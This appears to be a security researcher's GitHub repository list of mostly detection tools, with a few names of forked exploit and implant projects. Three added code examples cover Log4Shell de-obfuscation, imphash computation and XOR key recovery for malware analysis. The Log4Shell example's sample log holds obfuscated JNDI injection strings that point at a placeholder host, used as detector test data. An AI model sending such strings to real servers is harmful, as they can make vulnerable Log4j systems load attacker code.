Raccine [pinned] (C++, ★ 978, updated 2y ago): A Simple Ransomware Vaccine
signature-base [pinned] (YARA, ★ 3.0k, updated 9d ago): YARA signature and IOC database for my scanners and tools
yarGen-Go [pinned] (Go, ★ 75, updated 4mo ago): A YARA rule generator
Loki-RS [pinned] (Rust, ★ 332, updated 4d ago): 🐍 High-performance, multi-threaded YARA & IOC scanner
Loki (Python, ★ 3.8k, updated 5mo ago): Simple IOC and YARA Scanner
auditd (Shell, ★ 1.9k, updated 1mo ago): Best Practice Auditd Configuration
yarGen (Python, ★ 1.8k, updated 5mo ago): yarGen is a generator for YARA rules
munin (Python, ★ 853, updated 1y ago): Online hash checker for VirusTotal and other services
Fenrir (Shell, ★ 777, updated 4y ago): Simple Bash IOC Scanner
log4shell-detector (Python, ★ 725, updated 4y ago): Detector for Log4Shell exploitation attempts
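The Log4Shell detector entry above is about finding `${jndi:` lookups that attackers hide behind nested Log4j lookups such as `${lower:j}`, `${upper:...}` and `${::-j}`. The following is an added example of that de-obfuscation step, written for this page and not taken from the log4shell-detector project. It models only the lookup forms commonly seen in such payloads (an assumption: `lower:`, `upper:`, and the `:-default` fallback, which resolves to the default when the lookup fails); the access-log lines are constructed and use TEST-NET addresses.

```python
import re
from typing import List, Tuple

# Innermost lookup: a "${...}" whose body contains no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(body: str) -> str:
    """Evaluate one innermost Log4j-style lookup body, e.g. "lower:J" -> "j".

    Only the lookups seen in obfuscated Log4Shell payloads are modelled
    (an assumption, not the full Log4j lookup set): "lower:", "upper:" and
    the ":-default" syntax, which yields the default when the lookup fails
    ("${::-j}" and "${env:NOPE:-j}" both become "j").
    """
    prefix, _, rest = body.partition(":")
    key = prefix.lower()
    if key == "jndi":
        # Keep the JNDI lookup intact so the detector can see it; returning it
        # unchanged also makes the outer loop terminate.
        return "${" + body + "}"
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    # Unknown lookup without a default (e.g. "${date:yyyy}"): leave as-is.
    return "${" + body + "}"


def deobfuscate(text: str, max_rounds: int = 32) -> str:
    """Resolve innermost lookups repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def is_log4shell(line: str) -> bool:
    """True if the line carries a JNDI lookup once obfuscation is stripped."""
    return "${jndi:" in deobfuscate(line).lower()


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (raw line, de-obfuscated line) for every hit."""
    return [(line, deobfuscate(line)) for line in lines if is_log4shell(line)]


# Constructed access-log lines (not real traffic); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:10:12:00 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/Exploit}"',
    '203.0.113.7 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.9/a}"',
    '203.0.113.7 - - [10/Dec/2021:10:12:02 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.9/b}"',
    '203.0.113.7 - - [10/Dec/2021:10:12:03 +0000] "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi${env:NOPE:-:}ldap://203.0.113.9/c}"',
    '198.51.100.4 - - [10/Dec/2021:10:12:04 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.4 - - [10/Dec/2021:10:12:05 +0000] "GET /index.html HTTP/1.1" 200 "${date:yyyy-MM-dd}"',
]

if __name__ == "__main__":
    for raw, clean in scan(SAMPLE_LOG):
        print("HIT:", clean)
```

The innermost-first loop is what defeats nesting: each round collapses one layer, so `${${lower:j}ndi:...}` becomes `${jndi:...}` after a single pass, and the round limit keeps a malformed line from spinning forever. Matching the final form case-insensitively matters because Log4j resolves lookup prefixes without regard to case.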
yarAnalyzer (Python, ★ 395, updated 3y ago): YARA Rule Analyzer and Statistics
vti-dorks (★ 332, updated 3y ago): Awesome VirusTotal Intelligence Search Queries
Fnord (Shell, ★ 302, updated 4y ago): Pattern Extractor for Obfuscated Code
BlueLedger (★ 178, updated 3y ago): A list of my personal projects
YARA-Performance-Guidelines (★ 172, updated 1y ago): A guide on how to write fast and memory-friendly YARA rules
DLLRunner (Python, ★ 145, updated 11y ago): Smart DLL execution for malware analysis in sandbox systems
god-mode-rules (YARA, ★ 134, updated 1y ago): God Mode Detection Rules
yaraQA (Python, ★ 117, updated 22d ago): YARA rule analyzer to improve rule quality and performance
evt2sigma (Python, ★ 107, updated 4y ago): Log Entry to Sigma Rule Converter
mongobleed-detector (Shell, ★ 80, updated 5mo ago): Detection Script for MongoBleed Exploitation
ImpHash-Generator (Python, ★ 79, updated 9y ago): PE Import Hash Generator
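The import hash ("imphash") that the ImpHash-Generator entry refers to is the MD5 of a normalised list of a PE file's imports: each import is rendered as `dll.function`, the DLL name is lower-cased and loses a `.dll`/`.ocx`/`.sys` extension, function names are lower-cased, ordinal-only imports are mapped to a name where the ordinal is known and to `ordN` otherwise, and the entries are joined with commas in import-table order. Below is an added example of that computation, written for this page and not taken from the ImpHash-Generator project. It takes an already-parsed import list rather than reading a PE (assumption; in practice the list comes from a PE parser such as pefile, which also ships its own `get_imphash()`), and its ordinal table is a small excerpt for `ws2_32` only.

```python
import hashlib
from typing import List, Sequence, Tuple, Union

# Extensions dropped from the DLL name before hashing ("kernel32.dll" -> "kernel32").
_STRIP_EXT = ("dll", "ocx", "sys")

# Ordinal-to-name table. Assumption: this is a small excerpt of ws2_32's public
# export ordinals; a real implementation needs the full table (pefile keeps one
# in its ordlookup module).
_ORDINALS = {
    "ws2_32": {1: "accept", 2: "bind", 3: "closesocket", 4: "connect",
               23: "socket", 115: "WSAStartup", 116: "WSACleanup"},
}

Import = Tuple[str, Union[str, int]]  # (dll name, function name or ordinal)


def _normalize_dll(name: str) -> str:
    """Lower-case the DLL name and strip a .dll/.ocx/.sys extension."""
    name = name.lower()
    base, dot, ext = name.rpartition(".")
    if dot and ext in _STRIP_EXT:
        return base
    return name


def _func_name(dll: str, func: Union[str, int]) -> str:
    """Map an ordinal import to its name when known, else to 'ordN'."""
    if isinstance(func, int):
        return _ORDINALS.get(_normalize_dll(dll), {}).get(func, "ord%d" % func)
    return func


def imphash_string(imports: Sequence[Import]) -> str:
    """The normalised, order-preserving 'dll.func,dll.func,...' string that gets hashed."""
    parts: List[str] = []
    for dll, func in imports:
        parts.append("%s.%s" % (_normalize_dll(dll), _func_name(dll, func).lower()))
    return ",".join(parts)


def imphash(imports: Sequence[Import]) -> str:
    """MD5 hex digest of the import string; empty string when there are no imports."""
    s = imphash_string(imports)
    return hashlib.md5(s.encode()).hexdigest() if s else ""


# Constructed import table of a hypothetical sample (not a real file).
SAMPLE_IMPORTS: List[Import] = [
    ("KERNEL32.DLL", "GetProcAddress"),
    ("KERNEL32.DLL", "LoadLibraryA"),
    ("WS2_32.dll", 23),                   # ordinal import resolved to "socket"
    ("WS2_32.dll", 9999),                 # unknown ordinal stays "ord9999"
    ("ntoskrnl.exe", "IoCreateDevice"),   # ".exe" is not stripped
]

if __name__ == "__main__":
    print(imphash_string(SAMPLE_IMPORTS))
    print(imphash(SAMPLE_IMPORTS))
```

Two properties follow directly from the construction and are worth keeping in mind when pivoting on imphash values: the hash is order-sensitive, so two binaries with the same imports in a different order do not match, and it is case-insensitive, so `KERNEL32.DLL` and `kernel32.dll` hash identically. Ordinal handling is the usual source of mismatches between tools, because the result depends on which ordinal table each tool carries.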
Cyber-Search-Shortcuts (★ 78, updated 5y ago): Browser Shortcuts for Cyber Security Related Online Services
exotron (Python, ★ 76, updated 8y ago): Sandbox feature upgrade with the help of wrapped samples
YARA-Style-Guide (★ 75, updated 2y ago): A specification and style guide for YARA rules
tiny-shells (★ 65, updated 3y ago): All kinds of tiny shells
panopticon (YARA, ★ 64, updated 2y ago): A YARA Rule Performance Measurement Tool
Talks (★ 63, updated 4mo ago): Slides of my public talks
radiocarbon (Python, ★ 63, updated 8y ago): Leak File Analyzer
Rewind (C#, ★ 63, updated 5y ago): Immediate Virus Infection Countermeasures
LOLSecIssues (★ 58, updated 2y ago): Cybersecurity's lighter side: a collection of the most amusing misunderstandings and missteps from newcomers to offensive security tools. A repository where naiveté in infosec is met with humor.
ti-falsepositives (Python, ★ 56, updated 5y ago): A collection of typical false positive indicators
xorex (Python, ★ 51, updated 1y ago): XOR Key Extractor
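Malware droppers frequently carry an embedded payload encrypted with a short repeating XOR key, which is the situation an XOR key extractor like the xorex entry above targets. The example below is an added illustration written for this page, not code from the xorex project: it recovers a repeating key by known-plaintext attack, using the DOS-stub string that nearly every Windows PE contains. It assumes the key is at most `max_key_len` bytes and repeats at least once inside the known plaintext (the key must therefore be no longer than half the known string), and the encrypted buffer is constructed in the block rather than taken from a real sample.

```python
from typing import Optional, Tuple

# Known plaintext present in the DOS stub of almost every Windows PE file.
DOS_STUB = b"This program cannot be run in DOS mode"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, known: bytes = DOS_STUB,
                max_key_len: int = 16) -> Optional[Tuple[bytes, int]]:
    """Find a repeating XOR key by sliding `known` over `ciphertext`.

    At the true offset, ciphertext XOR known yields a slice of the key stream.
    A candidate key length k is accepted only if that slice is k-periodic
    over the whole known string, and only k <= len(known) // 2 is tried so the
    periodicity is confirmed by at least one full repetition (assumption that
    rules out trivial matches at wrong offsets). Returns (key, offset) with
    the key rotated so key[0] lines up with ciphertext[0], or None.
    """
    n = len(known)
    if n == 0 or len(ciphertext) < n:
        return None
    for off in range(len(ciphertext) - n + 1):
        stream = bytes(c ^ p for c, p in zip(ciphertext[off:off + n], known))
        for k in range(1, min(max_key_len, n // 2) + 1):
            if all(stream[i] == stream[i % k] for i in range(n)):
                # stream[i] == key[(off + i) % k]  =>  key[j] == stream[(j - off) % k]
                key = bytes(stream[(j - off) % k] for j in range(k))
                return key, off
    return None


def decrypt(ciphertext: bytes, known: bytes = DOS_STUB) -> Optional[bytes]:
    """Recover the key and return the decrypted buffer, or None if no key fits."""
    found = recover_key(ciphertext, known)
    if found is None:
        return None
    key, _ = found
    return xor_bytes(ciphertext, key)


# Constructed sample: a PE-like header with the DOS stub at offset 64, encrypted
# with a hypothetical 3-byte key. Neither is taken from a real file.
KEY = b"\x5a\xa3\x17"
PLAIN = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
         + b"\x00" * 48 + DOS_STUB + b".\r\r\n$\x00")
STUB_OFFSET = 64
CIPHER = xor_bytes(PLAIN, KEY)

if __name__ == "__main__":
    print(recover_key(CIPHER))
    print(decrypt(CIPHER)[:2])
```

The periodicity check is what separates a real key from noise: at a wrong offset the XOR of ciphertext and known text is effectively random and will not repeat with a short period, while at the right offset it repeats exactly every `len(key)` bytes. If the sample's DOS stub was stripped or the key is longer than the known text allows, a longer known plaintext (for example the `.text` section name padding or a known library string) is needed.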
webshell-intel (★ 49, updated 9y ago): Scan web servers for known webshell names and responses
cyber-chef-recipes (★ 40, updated 7y ago): Recipes for GCHQ's CyberChef Web App
NoCat (Go, ★ 37, updated 7mo ago): A harmless Netcat-lookalike for detection testing. Simulates NC-style command-line flags and listener behavior without exposing a real backdoor or shell.
littlesnitch-log-exporter (Python, ★ 35, updated 3y ago): LittleSnitch Log Statistics Exporter
sysmon-version-history (★ 33, updated 5y ago): An Unofficial Sysmon Version History (Change Log)
awesome-yara [fork] (★ 33, updated 2y ago): A curated list of awesome YARA rules, tools, and people.
ThreatResearch-Reporting-Guide (★ 31, updated 3y ago): Offensive Research Guide to Help Defense Improve Detection
SkeletonKeyScanner (Python, ★ 30, updated 11y ago): Scanner for the SkeletonKey Malware
prisma (Python, ★ 30, updated 4y ago): Command Line STDOUT Colorer
notepad-plus-plus-hashes (Python, ★ 25, updated 4mo ago): Aggregated SHA-256 and SHA-1 checksums for Notepad++ release assets, collected from official GitHub release checksum files.
ReginScanner (Python, ★ 25, updated 11y ago): Scanner for Regin Virtual Filesystems
atomic-threat-coverage [fork] (Python, ★ 23, updated 7y ago): Knowledge base of analytics designed to cover threats based on MITRE's ATT&CK.
BlueTeam-Tools [fork] (★ 23, updated 3y ago): Tools and Techniques for Blue Team / Incident Response
space-id (Python, ★ 21, updated 8y ago): Invisible Watermarks with Space Characters in ASCII Files
IRNotes [fork] (★ 17, updated 10y ago): Some IR notes
neolog (★ 16, updated 13y ago): Windows Syslog Command Line Client
yara-uuid-generator (Python, ★ 14, updated 1mo ago): A tool that adds reproducible UUIDs to YARA rules
narsil (Python, ★ 14, updated 11y ago): Spy Agency Teasing
MineMock (Go, ★ 13, updated 4mo ago): A harmless cryptocurrency miner simulator for detection testing. Generates realistic mining-like artifacts without consuming resources or connecting to actual pools.
YARA-rules [fork] (YARA, ★ 12, updated 7y ago): Some YARA rules I will add from time to time
malware-signatures [fork] (VimL, ★ 11, updated 10y ago): YARA rules for malware families seen as part of the targeted threats project
WPWatcher (Python, ★ 11, updated 6y ago): WordPress Watcher is a wrapper for WPScan that manages scans on multiple sites and reports by email
yara [fork] (C, ★ 10, updated 5y ago): The pattern matching swiss knife
defensive-project-ideas (★ 10, updated 3y ago): Ideas for projects for defensive research or blue teaming
rules [fork] (★ 10, updated 9y ago): Repository of YARA rules
ssh-auditor [fork] (Go, ★ 10, updated 7y ago): The best way to scan for weak SSH passwords on your network
Yara-Rules-5 [fork] (★ 9, updated 2y ago): Repository of YARA Rules
malware-ioc [fork] (YARA, ★ 9, updated 5y ago): Indicators of Compromise (IOC) from our various investigations
Windows-Exploit-Suggester [fork] (Python, ★ 9, updated 9y ago): This tool compares a target's patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
BlockWindows [fork] (Batchfile, ★ 9, updated 10y ago): Stop Windows 10 Nagging and Spying. Works with Win7-10
pe-sieve [fork] (C++, ★ 8, updated 8y ago): A small tool for investigating inline hooks (and other in-memory code patches)
Yara-Rules-2 [fork] (★ 8, updated 4y ago): Repository of YARA rules made by McAfee Enterprise ATR Team
CredsSpreader (★ 8, updated 5y ago): A tool to spread canary credentials in your organisation
agile-hacking (Visual Basic, ★ 8, updated 9y ago): Collection of hacks that make use of the bare minimum available on victim systems
moltbot-tui (JavaScript, ★ 7, updated 4mo ago): A neon-drenched terminal UI for MoltBot with Tamagotchi vibes. Live monitoring, 10 themes, and a robot that talks back.
yara-rules-1 [fork] (★ 7, updated 5y ago): No description.
threat-intel [fork] (Python, ★ 7, updated 4y ago): Signatures and IoCs from public Volexity blog posts.
pyattck [fork] (★ 7, updated 6y ago): A Python package to interact with the MITRE ATT&CK Framework
klara [fork] (PHP, ★ 7, updated 8y ago): Kaspersky's GReAT KLara
plyara-1 [fork] (Python, ★ 6, updated 2y ago): Parse YARA rules and operate over them more easily.
ATTACK-Python-Client [fork] (★ 6, updated 6y ago): Python Script to access ATT&CK content available in STIX via a public TAXII server
windows-privesc-check [fork] (Python, ★ 6, updated 11y ago): Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems
malware-gems [fork] (★ 6, updated 4y ago): A not so awesome list of malware gems for aspiring malware analysts
splunk-addon-powershell [fork] (★ 6, updated 7y ago): Splunk Add-on for PowerShell provides field extraction for PowerShell event logs.
PowerMemory [fork] (PowerShell, ★ 6, updated 10y ago): Exploit the credentials present in files and memory
nmap-nse-scripts [fork] (Lua, ★ 6, updated 9y ago): My collection of nmap NSE scripts
grr [fork] (Python, ★ 6, updated 7y ago): GRR Rapid Response: remote live forensics for incident response
sysmon-modular [fork] (★ 5, updated 5y ago): A repository of sysmon configuration modules
macguard-audit (Shell, ★ 5, updated 4mo ago): Lightweight macOS baseline checks: collect config signals and send them as JSON to your SIEM
speedy (Go, ★ 5, updated 10y ago): (Demo) Only used to demonstrate a memory leak caused by Golang regexp
BloodHound [fork] (PowerShell, ★ 5, updated 8y ago): Six Degrees of Domain Admin
alert_manager [fork] (JavaScript, ★ 5, updated 11y ago): Extended Splunk Alert Manager with advanced reporting on alerts, workflows (modify assignee, status, severity) and auto-resolve features
PassTweaker (Python, ★ 5, updated 11y ago): Tweaks password files to match modern password requirements
PyMISP [fork] (Python, ★ 5, updated 7y ago): Python library using the MISP REST API
PowerCat [fork] (PowerShell, ★ 5, updated 9y ago): A PowerShell TCP/IP swiss army knife.
naive-bayes-classifier [fork] (Python, ★ 5, updated 7y ago): Yet another general purpose naive Bayesian classifier.
language-thor (★ 5, updated 7y ago): Syntax Theme for THOR APT Scanner log files
DeleteShadowCopies [fork] (★ 4, updated 3y ago): Deleting Shadow Copies In Pure C++
DailyIOC [fork] (★ 4, updated 2y ago): IOCs from articles and tweets, kept for archival
cpython [fork] (Python, ★ 4, updated 7y ago): The Python programming language
bfg [fork] (C, ★ 4, updated 7y ago): No description.
laurel [fork] (★ 4, updated 4y ago): Transform Linux Audit logs for SIEM usage
harpoon [fork] (Python, ★ 4, updated 8y ago): CLI tool for open source and threat intelligence
TheHive [fork] (JavaScript, ★ 4, updated 9y ago): TheHive: a Scalable, Open Source and Free Incident Response Platform
ioc_signatures [fork] (★ 4, updated 5y ago): No description.
SunBurst_DGA_Decode [fork] (Python, ★ 4, updated 5y ago): SunBurst DGA Decode Script
ShimCacheParser [fork] (Python, ★ 4, updated 10y ago): No description.
pyminifier [fork] (Python, ★ 4, updated 11y ago): Pyminifier is a Python code minifier, obfuscator, and compressor.
Misc-Windows-Hacking [fork] (C++, ★ 4, updated 11y ago): Miscellaneous projects related to attacking Windows.
Misc-PowerShell-Stuff [fork] (PowerShell, ★ 4, updated 9y ago): Random PowerShell goodness
doublepulsar-detection-script [fork] (Python, ★ 4, updated 9y ago): A Python 2 script for sweeping a network to find Windows systems compromised with the DOUBLEPULSAR implant.
virustotal-skill (Shell, ★ 3, updated 4mo ago): AI agent skill for VirusTotal API v3: query hashes, investigate IOCs, search VT Intelligence, and manage YARA Livehunt/Retrohunt
yargen-go-skill (Shell, ★ 3, updated 4mo ago): AI agent skill to generate YARA rules from malware samples using yarGen-Go. Manages goodware databases, supports CLI and API for rule generation, and integrates with the yarGen web server. Use when generating YARA rules, managing goodware databases, creating custom string/opcode databases, or interacting with the yarGen web API.
detection-rules [fork] (★ 3, updated 5mo ago): Collection of my own detection rules
YARA_Rules [fork] (YARA, ★ 3, updated 3y ago): No description.
Venom [fork] (★ 3, updated 3y ago): Venom is a library that is meant to perform evasive communication using a stolen browser socket
betterdefaultpasslist [fork] (★ 3, updated 9y ago): No description.
CVE-2019-19781 [fork] (★ 3, updated 6y ago): Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway [CVE-2019-19781]
CVE-2018-0802 [fork] (Python, ★ 3, updated 8y ago): PoC Exploit for CVE-2018-0802 (and optionally CVE-2017-11882)
Cortex-Analyzers [fork] (Python, ★ 3, updated 5y ago): Cortex Analyzers Repository
asgard-playbooks [fork] (★ 3, updated 4y ago): No description.
NimPlant [fork] (HTML, ★ 3, updated 3y ago): A light-weight first-stage C2 implant written in Nim.
mimipenguin [fork] (Shell, ★ 3, updated 9y ago): A tool to dump the login password of the current Linux user
loki-cloud (★ 3, updated 3y ago): A flexible and lightweight way to execute LOKI on end systems
TrustlookWannaCryToolkit [fork] (Python, ★ 3, updated 9y ago): WannaCryToolkit scanner and removal toolkit
timebox [fork] (Python, ★ 3, updated 8y ago): Divoom Timebox CLI utility
RedPeanut [fork] (★ 3, updated 6y ago): RedPeanut is a small RAT developed in .NET Core 2, with its agent in .NET 3.5 / 4.0.
pefile-go [fork] (Python, ★ 3, updated 9y ago): Golang port of pefile
OTX-Python-SDK [fork] (Jupyter Notebook, ★ 3, updated 10y ago): Open Threat Exchange is an open community that allows participants to learn about the latest threats, research indicators of compromise observed in their environments, share threats they have identified, and automatically update their security infrastructure with the latest indicators to defend their environment.
clawdbot [fork] (TypeScript, ★ 2, updated 5mo ago): Your own personal AI assistant. Any OS. Any Platform. The lobster way. 🦞
plyara [fork] (Python, ★ 2, updated 9y ago): Parse YARA rules and operate over them more easily.
CAPEv2 [fork] (Python, ★ 2, updated 1y ago): Malware Configuration And Payload Extraction
icedid_analysis [fork] (★ 2, updated 4y ago): This repository contains analysis scripts, YARA rules, and additional IoCs related to the blog post "Let's set ice on fire: Hunting and detecting IcedID infections".
Sigma_rules [fork] (★ 2, updated 3y ago): Random Sigma rules to share with the community
100DaysOfYARA2023 [fork] (★ 2, updated 3y ago): Rules Shared by the Community from 100 Days of YARA 2023
detection-1 [fork] (★ 2, updated 2y ago): Detection in the form of YARA, Snort and ClamAV signatures.
CVE-2019-11510 [fork] (★ 2, updated 6y ago): Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)
dateparser [fork] (★ 2, updated 2y ago): Python parser for human readable dates
Detection [fork] (★ 2, updated 4y ago): No description.
NimPackt-v1 [fork] (★ 2, updated 4y ago): Nim-based assembly packer and shellcode loader for opsec & profit
InfoSec-Black-Friday [fork] (★ 2, updated 5y ago): All the deals for InfoSec related software/tools this Black Friday
vulninfos [fork] (★ 2, updated 8y ago): Information regarding publicly discussed vulnerabilities
go-grr-apiclient [fork] (Protocol Buffer, ★ 2, updated 9y ago): Golang API client for GRR Rapid Response
flowsynth [fork] (Python, ★ 2, updated 8y ago): A network packet capture compiler
oxide [fork] (★ 1, updated 1mo ago): Cross-platform C2 implant framework. Every TTP ships with YARA rules, Sigma rules, and IR playbooks.
cve-2021-21985_exp [fork] (★ 1, updated 5y ago): CVE-2021-21985 exploit
yarGen-dbs (★ 1, updated 8mo ago): Databases used in yarGen
thunderstorm-collector [fork] (★ 1, updated 6mo ago): THOR Thunderstorm Collectors
threat-team [fork] (YARA, ★ 1, updated 8mo ago): IOCs from Google Threat Intelligence Group
KittyStager [fork] (★ 1, updated 3y ago): KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant, called kitten. The purpose of this project is to have a web server and some kittens and be able to use them with any shellcode.
Detection-2 [fork] (★ 1, updated 1y ago): No description.
Yara-1 [fork] (YARA, ★ 1, updated 2y ago): No description.
ALFA-SHELL-V2.5 [fork] (PHP, ★ 1, updated 8y ago): ALFA-SHELL-V2.5.3
yara-rules-4 [fork] (★ 1, updated 2y ago): Collection of YARA signatures from individual research
wolf-tools [fork] (★ 1, updated 3y ago): Tools and scripts by Arctic Wolf
yara-rules-3 [fork] (★ 1, updated 3y ago): A collection of my YARA rules
imphash-go (★ 1, updated 9y ago): Imphash Generator
go-yara [fork] (Go, ★ 1, updated 8y ago): Go bindings for YARA
shellbags [fork] (Python, ★ 1, updated 9y ago): Cross-platform, open-source shellbag parser
Tools [fork] (★ 0, updated 2y ago): No description.
Signatures [fork] (★ 0, updated 3y ago): 🚧 Currently transferring TLP:CLEAR rules from the TLP:AMBER repository...
GCTI [fork] (YARA, ★ 0, updated 3y ago): No description.
protections-artifacts [fork] (★ 0, updated 3y ago): Elastic Security detection content for Endpoint
Koh [fork] (C#, ★ 0, updated 4y ago): The Token Stealer